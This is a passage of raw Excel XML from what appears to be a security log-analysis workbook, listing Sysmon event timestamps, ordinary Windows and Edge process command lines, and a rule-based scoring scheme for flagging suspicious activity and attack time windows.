    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2260,i,10523690045595089126,8847648928729877960,262144 --variations-seed-version --mojo-platform-channel-handle=2472 /prefetch:11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:01.270</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:01.356</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2260,i,10523690045595089126,8847648928729877960,262144 --variations-seed-version --mojo-platform-channel-handle=2848 /prefetch:13</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:03.645</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:09.178</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:09.187</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:11.387</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:11.410</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:12.785</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:20.369</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:23.543</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:23.605</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:26.287</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:52:28.124</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:53:13.570</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:54:47.654</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:11.820</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:11.836</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:11.879</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:19.691</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:19.731</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:19.791</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:21.747</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:21.769</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:21.774</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:55:22.919</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\MoNotificationUx.exe /ClearActiveNotifications /CV fOJKgTYqgEePljVC.1.0.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:56:19.671</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:56:19.729</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:56:19.735</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:56:20.996</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:56:21.009</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:56:36.055</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:57:07.794</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:57:22.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:57:22.201</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:57:22.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:57:23.132</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:57:41.968</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:58:18.901</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:58:20.871</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:58:44.903</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:58:44.954</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:58:48.809</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:58:48.810</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:58:48.811</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:24.926</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:26.154</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:26.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:27.076</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:42.579</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:42.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:42.641</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:42.848</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:42.898</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:42.915</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:44.356</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:59:44.473</t>
  </si>
  <si>
    <t>Sysmon - Suspicious Process - taskhost.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:11.352</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:11.407</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:11.425</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:11.447</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:11.452</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:11.488</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:13.749</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:13.767</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:17.868</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:17.878</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:17.908</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:31.954</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:32.002</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:32.006</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:52.642</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:52.689</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:54.499</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:54.535</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:54.590</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:54.617</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:54.621</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:57.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:57.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:59.831</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:00:59.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:03.776</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:07.073</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:39.849</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:39.897</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:43.357</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:46.445</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:48.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:48.257</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:51.561</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:51.585</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:51.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:51.598</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:52.996</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:01:53.007</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:02:28.625</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:02:28.636</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:02:28.639</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:02:28.681</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:02:31.089</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:04:59.070</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:04:59.081</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:04:59.093</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:00.223</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:11.916</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:11.928</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:12.960</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:12.973</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:25.879</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.704</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.709</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.715</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.722</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.729</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.734</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.742</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.754</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.759</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.767</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:27.777</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:28.753</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:28.763</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:30.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:38.945</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:38.959</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:38.968</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:38.969</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:40.500</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:40.503</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:40.505</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:40.514</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:40.515</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:40.573</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:40.581</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:41.835</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:05:41.838</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:06:43.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:06:43.079</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:06:43.084</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:06:43.126</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:06:44.169</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:09:51.592</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:09:52.806</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:09:52.816</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:09:52.825</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:09:55.020</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:01.166</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:01.180</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k wsappx -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:25.090</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:36.146</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:36.483</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:36.585</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x0 /state0:0xa3ca4055 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:37.268</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:37.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:37.723</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:37.825</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:37.939</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:40.582</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:10:40.616</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:11:11.890</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:11:45.103</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:15:10.673</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:15:10.715</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:15:35.142</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:15:55.262</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:16:47.110</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:19:15.644</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:19:53.491</t>
  </si>
  <si>
    <t>Microsoft-Windows-SmbClient/Connectivity</t>
  </si>
  <si>
    <t>Windows error event.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:19:53.516</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:20:57.487</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:22:03.596</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:24:54.952</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:03.836</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:03.858</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:20.286</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:31.788</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:31.814</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:31.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:33.839</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:33.852</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:33.865</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:26:35.168</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:27:05.089</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:27:15.179</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:27:15.213</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:28:26.943</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:28:30.767</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:28:45.859</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:29:00.998</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:30:55.464</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:30:55.479</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:31:48.738</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:31:50.272</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:31:50.286</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:31:51.590</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:31:51.602</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:31:51.610</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:39:20.163</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:39:20.205</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:41:03.824</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:41:03.840</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:43:17.416</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:43:17.461</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:45:53.921</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:45:53.945</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:45:55.644</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:45:55.658</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:44.351</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:44.562</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:44.584</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:44.585</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000001684;0000000000000ED8;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:58.122</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:58.207</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:58.351</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:58.956</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:58.983</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:59.145</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:59.151</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000001664;000000000000167C;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:59.167</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:59.551</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:59.574</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:48:59.672</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:00.704</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:00.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:01.812</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:08.386</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:08.433</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:12.575</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:12.645</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:15.385</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:18.322</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:20.971</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:22.885</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x264,0x268,0x26c,0x260,0x244,0x7fff536f7088,0x7fff536f7094,0x7fff536f70a0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:24.837</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=2088 /prefetch:2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:24.893</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:24.946</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=1492 /prefetch:13</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:24.958</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:27.763</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\identity_helper.exe\" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=4736 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:27.769</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:27.779</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:27.791</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=PooledProcess2 --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=4928 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:29.170</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:29.171</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:31.042</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:54.524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</si>
  <si>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--field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:54.542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</si>
  <si>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--field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:54.550</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-GB --service-sandbox-type=none --message-loop-type-ui --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=4732 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:57.572</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:57.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:57.623</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:49:59.838</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:50:26.336</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:50:26.346</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:50:27.649</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:50:28.806</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:50:30.039</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:50:49.764</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:51:24.502</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.26100.3624 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=5476 /prefetch:10</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:52:25.855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</si>
  <si>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--field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:52:49.678</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:53:17.459</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:53:17.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:53:17.512</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:53:18.672</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:53:18.690</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:53:18.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:53:52.179</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:54:25.810</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2148,i,16545954632103421628,6699113867377461045,262144 --variations-seed-version --mojo-platform-channel-handle=4028 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:55:28.708</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:55:28.747</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:56:03.850</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:56:03.869</t>
  </si>
  <si>
    <t>May 9, 2025 @ 17:56:35.986</t>
  </si>
  <si>
    <t>Rule-based point scoring (by feateure)</t>
  </si>
  <si>
    <t>Categories</t>
  </si>
  <si>
    <t>Time with highest composite score</t>
  </si>
  <si>
    <t>Per feature score</t>
  </si>
  <si>
    <t>+</t>
  </si>
  <si>
    <t>Anomaly score</t>
  </si>
  <si>
    <t>=</t>
  </si>
  <si>
    <t>Composite Score</t>
  </si>
  <si>
    <t>UTC Attack Start</t>
  </si>
  <si>
    <t>UTC Attack End</t>
  </si>
  <si>
    <t>Suspicious connection or logon</t>
  </si>
  <si>
    <t>Suspicious command line or scripts</t>
  </si>
  <si>
    <t>Suspicious lateral movement or file transfer</t>
  </si>
  <si>
    <t>Suspicious lateral movement or file transfer, rule level more than 6</t>
  </si>
  <si>
    <t>Suspicious command line or scripts, rule level more than 6</t>
  </si>
  <si>
    <t>Rule level more than 6</t>
  </si>
  <si>
    <t>Other suspicious activities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</si>
</sst>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33" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="34" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="20" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1"/>
    <xf numFmtId="2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20</xdr:col>
      <xdr:colOff>25400</xdr:colOff>
      <xdr:row>37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EC7262-2D3A-81E0-EA65-32EAFF4BD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9050"/>
          <a:ext cx="15144750" cy="561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F8BB6-8E71-49C6-9B3D-6B8C39E0640D}">
  <sheetPr filterMode="1"/>
  <dimension ref="A1:AA5315"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="I1" workbookViewId="0">
      <selection activeCell="AB5004" sqref="AB5004"/>
    </sheetView>
  </sheetViews>
